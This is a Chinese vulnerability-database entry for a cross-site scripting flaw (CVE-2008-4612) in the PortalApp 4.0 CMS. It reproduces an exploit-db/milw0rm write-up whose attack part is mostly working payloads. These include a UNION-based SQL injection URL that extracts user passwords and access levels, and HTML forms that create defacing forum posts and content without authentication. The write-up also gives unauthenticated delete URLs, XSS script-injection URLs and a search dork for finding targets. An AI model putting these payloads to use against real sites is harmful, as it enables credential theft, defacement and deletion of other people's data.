PortalApp 'forums.asp' and 'content.asp' 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114235 漏洞类型 跨站脚本
发布时间 2008-01-06 更新时间 2009-01-29
CVE编号 CVE-2008-4612 CNNVD-ID CNNVD-200810-310
漏洞平台 ASP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/4848
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-310
|漏洞详情
PortalApp存在跨站脚本攻击漏洞,远程攻击者通过forums.asp和content.asp的keywords执行任意web脚本或HTML。
|漏洞EXP
##############################################################################
#Title: PortalApp 4.0 Multiple vulnerabilities                               #
#                                                                            #
#Discovered By: r3dm0v3                                                      #
#               http://r3dm0v3.persianblog.ir                                #
#               r3dm0v3( 4t }yahoo[dot}com                                   #
#               Tehran - Iran                                                #
#                                                                            #
#Vendor: http://www.portalapp.com                                            #
#Vulnerable Version: 4.0, prior versions maybe vulnerable                    #
#Remote Exploit: Yes                                                         #
#Dork: "Copyright @2007 Iatek LLC"                                           #
#Fix: Not Available                                                          #
##############################################################################

##############################################################################
#                       SQL Injection (CRITICAL)                             #
##############################################################################
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!

#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users

author will be usernames
topic will be passwords
replies will be username IDs
views will be access levels (5 is super admin)


##############################################################################
# Following actions in 'forum.asp' can take done without any authentication. #
##############################################################################
create a forum:
<html>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
 Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
 ForumSection:<input type=text name=ForumSection value="Hacked"><br>
 DisplayOrder:<input type=text name=DisplayOrder value=1><br>
 <input type=submit>
</form>
</html>

create a topic:
<html>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumID:<input type=text name=ForumId value=><br>
 Subject:<input type=text name=Subject value="r3dm0v3."><br>
 Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
 Icon:<input type=text name=Icon value=14><br>
 Show Signature:<input type=text name=Showsignature value=0><br>
 Notify:<input type=text name=Notify ><br>
 Locked:<input type=text name=Locked value=1><br>
 Sticky:<input type=text name=Sticky ><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 DateLast:<input type=text name=DateLast value="6/1/2008"><br>
 <input type=submit>
</form>
</html>

delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]

#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies


##############################################################################
#Following actions in 'Content.asp' can take done without any authentication.#
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
 catID:<input type=text name=CatID value=198><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 Author:<input type=text name=Author value=r3dm0v3><br>
 title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
 ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
 LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
 relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
 DownloadURL:<input type=text name=DownloadURL><br>
 Filename:<input type=text name=Filename><br>
 Thumbnail:<input type=text name=Thumbnail><br>
 Image1:<input type=text name=Image1><br>
 PrevContentID:<input type=text name=PrevContentId><br>
 NextContentID:<input type=text name=NextContentId><br>
 views:<input type=text name=Impressions value=10000><br>
 AVGRating:<input type=text name=AvgRating value=10000><br>
 <input type=submit>
</form>
</html>

'insert_detail_content' is also vulnerable. Use above html code for exploit


##############################################################################
#                                   XSS                                      #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

# milw0rm.com [2008-01-06]
|参考资料

来源:www.aspapp.com
名称:http://www.aspapp.com/content.asp?CatId=197&Content
链接:http://www.aspapp.com/content.asp?CatId=197&ContentType=Downloads
来源:XF
名称:portalapp-forums-content-xss(39455)
链接:http://xforce.iss.net/xforce/xfdb/39455
来源:BID
名称:27170
链接:http://www.securityfocus.com/bid/27170
来源:MILW0RM
名称:4848
链接:http://www.milw0rm.com/exploits/4848
来源:SREASON
名称:4439
链接:http://securityreason.com/securityalert/4439
来源:SECUNIA
名称:28337
链接:http://secunia.com/advisories/28337